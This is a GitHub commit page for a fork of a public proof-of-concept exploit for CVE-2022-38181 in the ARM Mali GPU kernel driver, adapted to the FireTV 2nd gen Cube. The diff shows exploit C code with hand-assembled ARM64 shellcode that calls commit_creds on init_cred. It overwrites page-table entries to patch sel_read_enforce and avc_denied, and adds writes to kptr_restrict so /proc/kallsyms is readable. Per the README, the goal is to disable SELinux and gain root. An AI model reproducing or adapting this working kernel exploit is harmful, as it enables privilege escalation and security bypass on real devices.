Skip to content

Commit

Permalink
修正をすべてリセットし、kallsymsが読めるように関数と処理追加
Browse files Browse the repository at this point in the history
https://xdaforums.com/t/potential-arm-mali-gpu-based-root-firehd-8th-12th-gen-affected.4574635/post-89498086
実行後に/proc/kallsymsが利用可能

Signed-off-by: yuu <46545607+mouseos@users.noreply.github.com>
  • Loading branch information
mouseos authored May 9, 2024
1 parent fa095e0 commit de35187
Show file tree
Hide file tree
Showing 2 changed files with 24 additions and 25 deletions.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
## Exploit for CVE-2022-38181 for FireTV 2nd gen Cube

This is a fork of security researcher Man Yue Mo's [Pixel 6 POC](https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_38181) for CVE-2022-38181. Read his detailed write-up of the vulnerability [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/). Changes have been made to account for FireOS's 32bit userspace, as well as the 2nd gen Cube's older Bifrost drivers (r16p0) and Linux kernel (4.9.113) versions. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root.
This is a fork of security researcher Man Yue Mo's <a href="https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_38181">Pixel 6 POC</a> for CVE_2022_38181. Read his detailed write-up of the vulnerability <a href="https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/">here</a>. Changes have been made to account for FireOS's 32bit userspace, as well as the 2nd gen Cube's older Bifrost drivers (r16p0) and Linux kernel (4.9.113) versions. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root.

I used the following command to compile with clang in ndk-21:
```
Expand Down
47 changes: 23 additions & 24 deletions mali_shrinker_mmap32.c
Original file line number Diff line number Diff line change
Expand Up @@ -91,7 +91,6 @@ Overwriting SELinux to permissive
static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};

static uint32_t root_code[8] = {0};
static uint32_t root_code2[8]={0};
static uint32_t root_code_un[8] = {0};

static uint8_t jit_id = 1;
Expand Down Expand Up @@ -466,21 +465,7 @@ void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_en
printf("Run fixup_root_shell_un\n");
}

void fixup_root_shell2(uint64_t init_cred, uint64_t commit_cred, uint64_t avc_deny, uint32_t add_init, uint32_t add_commit) {
printf("Run fixup_root_shell2\n");
uint32_t init_adpr = write_adrp(0, avc_deny, init_cred);
// Sets x0 to init_cred
root_code2[ADRP_INIT_INDEX] = init_adpr;
root_code2[ADD_INIT_INDEX] = add_init;
// Sets x8 to commit_creds
root_code2[ADRP_COMMIT_INDEX] = write_adrp(8, avc_deny, commit_cred);
root_code2[ADD_COMMIT_INDEX] = add_commit;
root_code2[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
root_code2[5] = 0xd63f0100; // blr x8
root_code2[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
root_code2[7] = 0xd65f03c0; // ret
printf("End fixup_root_shell2\n");
}


void fixup_root_shell_nop() {

Expand Down Expand Up @@ -673,7 +658,6 @@ void select_offset() {
// fixup_root_shell(0x12253F0, 0x5B328, selinux_enforcing_READ, 0x910FC000, 0x910CA108);
//fixup_root_shell_un(INIT_CRED_neo, COMMIT_CREDS_neo, sel_read_handle_unknown, ADD_INIT_neo, ADD_COMMIT_neo);
fixup_root_shell(INIT_CRED_neo, COMMIT_CREDS_neo, sel_read_enforce, ADD_INIT_neo, ADD_COMMIT_neo);
fixup_root_shell2(INIT_CRED_neo, COMMIT_CREDS_neo,AVC_DENY_neo,ADD_INIT_neo, ADD_COMMIT_neo);
return;
}
err(1, "unable to match build id\n");
Expand All @@ -691,15 +675,33 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved)
//Go through the reserve pages addresses to write to avc_denied with our own shellcode
write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
}
/*for onyx
void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
usleep(100000);
//Call commit_creds to overwrite process credentials to gain root
write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t));
// write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
// write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
}
*/
//original code(avc_deny)
void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
/* Skip this
uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
usleep(100000);
//Go through the reserve pages addresses to write to avc_denied with our own shellcode
write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code2[0]), sizeof(root_code2)/sizeof(uint32_t));
write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
//Triggers avc_denied to disable SELinux
open("/dev/kmsg", O_RDONLY);
*/
uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);

Expand Down Expand Up @@ -789,15 +791,12 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
uint64_t pgd = alias_region + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000);
LOG("Found pgd %d, %llx\n", pgd_idx, pgd);
atom_number++;

write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0]));
usleep(100000);
write_kptr_restrict(mali_fd, mali_fd2, pgd, &(reserved[0]));
usleep(100000);
write_kptr_restrict(mali_fd, mali_fd2, pgd, &(reserved[0]));
usleep(100000);
write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
usleep(100000);


printf("time to run_enforce\n");
run_enforce();
run_enforce_un();
Expand Down Expand Up @@ -870,4 +869,4 @@ Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thi
}
return -1;
}
#endif
#endif

0 comments on commit de35187

Please sign in to comment.